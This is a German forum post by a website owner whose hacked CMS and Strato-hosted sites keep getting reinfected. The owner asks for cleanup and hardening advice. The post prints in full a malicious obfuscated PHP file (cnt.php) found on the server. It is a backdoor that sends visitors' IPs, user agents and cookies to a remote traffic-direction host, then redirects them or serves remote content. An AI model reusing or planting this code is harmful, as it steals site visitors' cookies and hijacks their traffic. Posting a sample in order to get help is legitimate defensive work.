Mhm ...
also ich hatte es soweit, dass alles auber war, aber nun ist schon wieder auf den 3 Seiten etwas drauf!
Also ein CMS mit zwei Mandaten und eine staatische Webseite.
Also an einem Trojaner an meiner Rechner kann es nicht liegen! Ich habe auch jegliche Passwörter geändert. Selbst Stato hat die Seiten wieder freigeben!
Ich habe jetzt auch in dem Root-Verzeichniss eine neue Datei gefunden: cnt.php die gab es schon mal da hieß sie aber esd.php.
Code: Alles auswählen
<?php $cfg='4utAps9M23+av3qGJApJ2ViJ7mTeyu5qM+lPQUUEzN3FG5Xkv57qP/gFTKPe7COOI1A2cQHgOk+rJveYrFF2wxFygVibNtFIvHda0IrewwfxQMiH/TJdLV3wMPFoSS/z3WIyXNOanuLPsFXBNdXusA9sjmypzU0D9SnrDpjlX9mKRYMLtqOlXvVPcAHfv9UjSApudGOIPwElENzPA+j7lISPyES7gYsar2Ha3EoZEWiABg=='; ?>
<? function _1267189193($i){$a=Array('TnpZZGt3SA==','ZEs2','','SCo=','bW9kZQ==','Y29uZmln','a2V5','a2V5','PGZvcm0gbmFtZT0iZm9ybTEiIG1ldGhvZD0icG9zdCIgYWN0aW9uPT9tb2RlPXNldGNvbmZpZyZrZXk9','a2V5','PjxwcmU+ClREUzogICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdGRzIiB2YWx1ZT0i','dXJs','Ij4gIFREUyBJUDogIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdGRzaXAiIHZhbHVlPSI=','aXA=','Ij4KS0VZOiAgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBrZXkiIHZhbHVlPSI=','a2V5','Ij4gIFJlc2VydmU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdG8iIHZhbHVlPSI=','bGlu','Ij4KSUQ6ICAgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBlc2RpZCIgdmFsdWU9Ig==','aWQ=','Ij4gIDxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9IlN1Ym1pdCIgdmFsdWU9Im9rIj48L3ByZT4KPC9mb3JtPg==','c2V0Y29uZmln','a2V5','a2V5','Lw==','U0NSSVBUX05BTUU=','dXJs','cHRkcw==','aXA=','cHRkc2lw','bGlu','cHRv','aWQ=','cGVzZGlk','a2V5','cGtleQ==','dw==','','U2F2ZWQuCg==','a2lsbA==','a2V5','a2V5','Nzc3','U0NSSVBUX0ZJTEVOQU1F','U0NSSVBUX0ZJTEVOQU1F','b2sK','Lw==','dXJs','aXA=','aXA=','aHR0cDovLw==','SFRUUF9IT1NU','U0NSSVBUX05BTUU=','UkVNT1RFX0FERFI=','bm8=','SFRUUF9YX0ZPUldBUkRFRF9GT1I=','eWVz','SFRUUF9VU0VSX0FHRU5U','aWQ=','aWQ=','a2V5','Jg==','a2V5','PQ==','UVVFUllfU1RSSU5H','R0VUIA==','dXJs','P2RvbT0=','JnJlZj0=','JmlwPQ==','JnByb3g9','JmFnZW50PQ==','JmNvb2tpZT0=','JmVzZGlkPQ==','aWQ=','JmZyYW1laWQ9','IEhUVFAvMS4wDQo=','R0VUIA==','dXJs','P2RvbT0=','JnJlZj0=','JmlwPQ==','JnByb3g9','JmFnZW50PQ==','JmNvb2tpZT0=','JmVzZGlkPQ==','aWQ=','IEhUVFAvMS4wDQo=','SG9zdDog','DQo=','Q29ubmVjdGlvbjogQ2xvc2UNCg0K','DQo=','ZG8=','ZG8=','IA==','bGlu','MjAw','bGlu','Oi8v','aHR0cA==','SFRUUC8xLjEgMzAyIEZvdW5k','TG9jYXRpb246IA==','Y29vaw==','Jg==','PQ==','ZWNobw==');return base64_decode($a[$i]);} ?><?php error_reporting(0);$key=_1267189193(0);function string_cpt($String,$Password){$Salt=_1267189193(1);$StrLen=strlen($String);$Seq=$Password;$Gamma=_1267189193(2);while(strlen($Gamma)<$StrLen){$Seq=pack(_1267189193(3),sha1($Gamma .$Seq .$Salt));$Gamma .= substr($Seq,0,8);}return $String^$Gamma;}$c=unserialize(string_cpt(base64_decode($cfg),$key));$mode=$_REQUEST[_1267189193(4)];if($mode == _1267189193(5)AND $c[_1267189193(6)]== $_REQUEST[_1267189193(7)]){echo _1267189193(8) .$_REQUEST[_1267189193(9)] ._1267189193(10) .$c[_1267189193(11)] ._1267189193(12) .$c[_1267189193(13)] ._1267189193(14) .$c[_1267189193(15)] ._1267189193(16) .$c[_1267189193(17)] ._1267189193(18) .$c[_1267189193(19)] ._1267189193(20);die();}if($mode == _1267189193(21)AND $c[_1267189193(22)]== $_REQUEST[_1267189193(23)]){$sn=explode(_1267189193(24),$_SERVER[_1267189193(25)]);foreach($sn as $snn){$scr=$snn;}$getlpa=file($scr);$strng=$getlpa[0];$file=file($scr);for($i=0;$i<sizeof($file);$i++)if($i == 0){$c[_1267189193(26)]=$_POST[_1267189193(27)];$c[_1267189193(28)]=$_POST[_1267189193(29)];$c[_1267189193(30)]=$_POST[_1267189193(31)];$c[_1267189193(32)]=$_POST[_1267189193(33)];$c[_1267189193(34)]=$_POST[_1267189193(35)];$cfg=base64_encode(string_cpt(serialize($c),$key));$file[$i]="<?\$cfg='$cfg'; ?>\n";}$fp=fopen($scr,_1267189193(36));if(fputs($fp,implode(_1267189193(37),$file)))die(_1267189193(38));fclose($fp);}if($mode == _1267189193(39)AND $c[_1267189193(40)]== $_REQUEST[_1267189193(41)]){chmod(_1267189193(42),$_SERVER[_1267189193(43)]);if(unlink($_SERVER[_1267189193(44)]))die(_1267189193(45));}$dom=explode(_1267189193(46),$c[_1267189193(47)]);$dom=$dom[2];$dhost=$dom;if($c[_1267189193(48)]){$dom=$c[_1267189193(49)];}$fp=fsockopen($dom,80,$errno,$errstr,2);if(!$fp){$res=1;}else{$t_dom=urlencode(_1267189193(50) .$_SERVER[_1267189193(51)] .$_SERVER[_1267189193(52)]);$t_ref=urlencode($_SERVER[HTTP_REFERER]);$t_ip=urlencode($_SERVER[_1267189193(53)]);$t_prox=_1267189193(54);if($_SERVER[_1267189193(55)]){$t_prox=_1267189193(56);}$t_agent=urlencode($_SERVER[_1267189193(57)]);if(isset($_GET[_1267189193(58)]))$t_frameid=urlencode($_GET[_1267189193(59)]);foreach($_COOKIE as $c[_1267189193(60)]=> $val){$t_cookie=$t_cookie ._1267189193(61) .$c[_1267189193(62)] ._1267189193(63) .$val;}$t_cookie=urlencode($t_cookie);if(empty($t_cookie)){$t_cookie=urlencode($_SERVER[_1267189193(64)]);}if(isset($t_frameid)){$out=_1267189193(65) .$c[_1267189193(66)] ._1267189193(67) .$t_dom ._1267189193(68) .$t_ref ._1267189193(69) .$t_ip ._1267189193(70) .$t_prox ._1267189193(71) .$t_agent ._1267189193(72) .$t_cookie ._1267189193(73) .$c[_1267189193(74)] ._1267189193(75) .$t_frameid ._1267189193(76);}else{$out=_1267189193(77) .$c[_1267189193(78)] ._1267189193(79) .$t_dom ._1267189193(80) .$t_ref ._1267189193(81) .$t_ip ._1267189193(82) .$t_prox ._1267189193(83) .$t_agent ._1267189193(84) .$t_cookie ._1267189193(85) .$c[_1267189193(86)] ._1267189193(87);}$out .= _1267189193(88) .$dhost ._1267189193(89);$out .= _1267189193(90);fwrite($fp,$out);while(!feof($fp)){$str=fgets($fp,128);$ch .= $str;if($str == _1267189193(91)&& empty($he)){$he=_1267189193(92);}if($he == _1267189193(93)){$goto .= $str;}}fclose($fp);}$goto=substr($goto,2);$ch=explode(_1267189193(94),$ch);if($res){$goto=$c[_1267189193(95)];}if($ch[1]== _1267189193(96)){}else{$goto=$c[_1267189193(97)];}$gotoe=explode(_1267189193(98),$goto);If($gotoe[0]== _1267189193(99)){header(_1267189193(100));header(_1267189193(101) .$goto);}$goto_body=substr($goto,7);If($gotoe[0]== _1267189193(102)){$gotoee=explode(_1267189193(103),$goto_body);foreach($gotoee as $setcook){$set=explode(_1267189193(104),$setcook);setcookie($set[0],$set[1]);}}If($gotoe[0]== _1267189193(105)){echo $goto_body;} ?>
Gut, jetzt kann ich ja schauen, welche Dateien von gestern zu heute geändert wurden ... aber ein paar Fragen habe ich noch!
Sehe ich denn an den geänderten Dateien, ob dort die Schadsoftware drin ist ... oder kann es auch sein, dass aus einer älteren Datei alles ineziert wird?
Kann denn ein Trojaner auf dem Kundenrechner auch Passwörter ausspionieren, die der Kunde gar nicht hat? (Habe ja alle geändert)
Gibt es vieleicht Tipps was man bei Strato besser einschränken sollte.
Auf der Webseite läuft auch noch Piwik und MySqlDumber .. aber ich habe erste gestern die neusten Versionen heruntergleaden und installiert.